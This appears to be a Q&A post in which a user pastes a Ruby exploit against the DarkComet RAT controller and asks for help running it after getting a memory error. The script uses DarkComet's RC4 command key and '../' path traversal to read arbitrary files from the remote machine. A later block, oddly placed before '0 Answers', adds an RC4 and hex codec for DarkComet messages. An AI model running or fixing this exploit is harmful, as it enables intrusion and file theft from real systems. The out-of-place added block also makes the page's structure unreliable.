
I stumbled across this nice paper: http://matasano.com/research/PEST-CONTROL.pdf

It shows some reverse engineering of RATs.

Now, the second exploit interests me; it's a Python script. Found another one:

require 'rc4'
require 'socket'
require 'hex_string'
require 'timeout'

class Util

    def initialize (key__, socket__, h__, p__)
        @key__ = key__
        @socket__ = socket__
        @h__ = h__
        @p__ = p__
    end

    def cryptfordc(thing)
        RC4.new(@key__).encrypt(thing).to_hex_string.upcase.gsub! ' ',''
    end

    def grabfile(name)
        @xx=cryptfordc('QUICKUP133|%s|UPLOADEXEC' % name)
        @socket__.write(@xx)
        begin
            timeout(3) do
                @socket__.recvfrom(1024)
                @socket__.recvfrom(1024)
            end
        rescue Timeout::Error
            STDERR.write "Timeout; Or the file is not there.\r\n"
            exit
        end
        @socket__.write('\x00')
        x=''
        while 1
            aa=@socket__.recvfrom(1000000)
            if aa.nil? || aa.empty?
                break
            else
                x=x+aa.join
                begin
                    @socket__.write('\x00')
                rescue Errno::EPIPE
                    break
                end
            end
        end
        return x
    end

    def testt(path)

        @utemp = cryptfordc('QUICKUP111|%s|UPLOADEXEC' % (path+'NTUSER.INI'))
        @socket__.write(@utemp)
        begin
            timeout(3) do
                @socket__.recvfrom(1024)
                @socket__.recvfrom(1024)
            end
        rescue Timeout::Error
            resetsock()
            return false
        end
        return true
    end
    def resetsock
        @socket__=TCPSocket.open(@h__,@p__)
        @socket__.recvfrom(12)
    end
    def finduserprofile
        @upath = "../"
        while 1
            if(testt(@upath) == false)
                @upath=@upath+"../"
            else
                break
            end
        end
        return @upath
    end
end

h=String(ARGV[0])
p=Integer(ARGV[1])
s=TCPSocket.open(h,p)
s.recvfrom(1024)
uu=Util.new('#KCMDDC51#-890'+ARGV[2], s, h, p)
dd = uu.finduserprofile()
uu.resetsock()
STDERR.write dd+"\r\n"
STDOUT.write uu.grabfile('%s%s'% [dd, ARGV[3]])

It's Ruby. I have fixed some errors in it, now I can't seem to manage to run it at all. I start the DarkComet client listening on port 1604, everything seems fine. I guess this code is missing a part... The initial connection?

Did some analysis and still can't manage to run it.

The error I get is:

../rndc.rb:31:in `recvfrom': failed to allocate memory (NoMemoryError)
        from dc.rb:31:in `grabfile'
        from dc.rb:85:in `<main>'

What to do? Any help is appreciated. Purpose of this is learning. I want to see it practically and analyze it further!

Nima Derakhshanjan
  • I'm afraid we won't be able to debug this for you--there's not enough information here. However, you may find that learning how to debug Ruby will be helpful to you. See questions such as this one: http://stackoverflow.com/questions/3955688/how-do-i-debug-ruby-scripts and also google for "debugging Ruby". Please come back and ask specific, answerable questions when you have them and we'll help. – Wayne Conrad Jul 31 '15 at 21:13
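The script's `cryptfordc` shows how DarkComet frames its commands: RC4 under the key `'#KCMDDC51#-890'` plus the password, then upper-case hex. For analysts who only want to read captured traffic (for example, to spot `QUICKUP` requests in a pcap) the same codec is enough, and it needs none of the socket handling that is failing above. The following is an added example, not code from the question or from the Matasano paper, and it uses only the Ruby standard library instead of the `rc4` and `hex_string` gems; the sample message and the `dc_*` function names are constructed here.

```ruby
# Added example: stdlib-only RC4 + hex codec for DarkComet-style messages,
# intended for decoding captured C2 traffic during analysis.
# Key prefix and hex encoding follow the script in the question; the sample
# plaintext below is constructed for illustration.

# Plain RC4 (key scheduling + keystream); symmetric, so the same routine
# both encrypts and decrypts. Returns a binary (ASCII-8BIT) string.
def rc4(key, data)
  s = (0..255).to_a
  k = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.length]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  out = data.bytes.map do |byte|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xff]
  end
  out.pack('C*')
end

# Default key prefix used by the script in the question; the server
# password (ARGV[2] there) is appended to it.
DC_KEY_PREFIX = '#KCMDDC51#-890'

def dc_key(password = '')
  DC_KEY_PREFIX + password
end

# Encode the way the client does: RC4, then upper-case hex, no separators.
def dc_encode(plain, password = '')
  rc4(dc_key(password), plain).unpack('H*').first.upcase
end

# Decode a captured hex message. Returns nil for input that is not a
# whole number of hex bytes, so a caller scanning a stream can skip noise.
def dc_decode(hex, password = '')
  return nil unless hex =~ /\A(?:[0-9A-Fa-f]{2})+\z/
  rc4(dc_key(password), [hex].pack('H*'))
end

# Constructed sample: a QUICKUP request as it would appear on the wire
# when the server has no password set.
SAMPLE_PLAIN = 'QUICKUP133|C:\\test.txt|UPLOADEXEC'
SAMPLE_HEX = dc_encode(SAMPLE_PLAIN)

if __FILE__ == $PROGRAM_NAME
  puts "hex on wire: #{SAMPLE_HEX}"
  puts "decoded:     #{dc_decode(SAMPLE_HEX)}"
end
```

To decode a real capture, feed each hex blob from the TCP payload to `dc_decode` with the server's password; a decode that comes back as readable pipe-delimited text confirms the key, while garbage means the password (or the key prefix for a different DarkComet build) is wrong.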

0 Answers